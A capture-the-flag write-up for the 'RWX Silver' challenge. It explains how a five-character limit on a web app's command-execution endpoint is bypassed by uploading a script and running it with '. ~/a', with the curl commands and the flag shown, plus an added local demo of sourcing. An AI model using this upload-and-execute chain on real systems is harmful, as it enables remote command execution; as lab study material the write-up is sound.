RWX Silver

Initial Look
We are supplied a rwx-silver.zip, which extracts to a handout folder.
The app.py and would.c are outlined in RWX Bronze, but with a minor change:
@app.route('/exec')
def execute():
    cmd = request.args.get('cmd', '')
    if len(cmd) > 5:
        return 'Command too long', 400
    ...
The cmd input can only be 5 characters this time, so we can't use sh ~/a to execute ~/a.
The shorter way
We can also use . as an alias for source, which is used to "load any functions file into the current shell script or a command prompt." (Source)
We can supply bash scripts to source and execute their contents like so:
$ echo '#!/bin/bash' > script.sh
$ echo "whoami" >> script.sh
$ . ./script.sh
user
Repeating the exploit
Now, using the same exploit from Bronze, I make a new script to execute would:
#!/bin/sh
/would you be so kind to provide me with a flag
I upload it to /home/user/a
$ curl -X POST "https://<instance>.inst2.chal-kalmarc.tf/write?filename=/home/user/a" -T test.sh
OK
Then I execute it with the . command:
$ curl "https://<instance>.inst2.chal-kalmarc.tf/exec?cmd=.%20~/a"
kalmar{impressive_that_you_managed_to_get_this_far_but_surely_silver_is_where_your_rwx_adventure_ends_b4284b024113}
Flag: kalmar{impressive_that_you_managed_to_get_this_far_but_surely_silver_is_where_your_rwx_adventure_ends_b4284b024113}
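
A local reproduction of the length check and of what . needs from the file it reads, as an added example that is not part of the original writeup or the challenge code. The names cmd_len, fits_limit, source_demo and marker are constructed, and the file is written under a temporary HOME rather than /home/user.

```shell
#!/bin/sh
# Added example (constructed): compares the two commands against the 5-character
# cap and sources a non-executable file from a throwaway HOME.

# Length as the handler's len(cmd) counts it (ASCII input assumed).
cmd_len() { printf '%s' "${#1}"; }

# Same comparison as the handler: anything longer than 5 is rejected.
fits_limit() { [ "$(cmd_len "$1")" -le 5 ]; }

# Write a file with no shebang and no execute bit, source it via ". ~/a" in a
# child shell whose HOME is a temp directory, then read a variable it set.
source_demo() {
    tmp=$(mktemp -d) || return 1
    printf 'marker=ran-in-current-shell\n' > "$tmp/a"
    chmod 600 "$tmp/a"
    out=$(HOME="$tmp" sh -c '. ~/a; printf "%s" "$marker"')
    rm -rf "$tmp"
    printf '%s' "$out"
}

# Show how each candidate fares against the cap.
for c in 'sh ~/a' '. ~/a'; do
    if fits_limit "$c"; then verdict=accepted; else verdict=rejected; fi
    printf '%-8s len=%s %s\n' "$c" "$(cmd_len "$c")" "$verdict"
done
printf 'sourced file (mode 600, no shebang): %s\n' "$(source_demo)"
```

The variable set by the file is visible afterwards because . runs the file's lines inside the calling shell, which is also why neither an execute bit nor an interpreter line is needed.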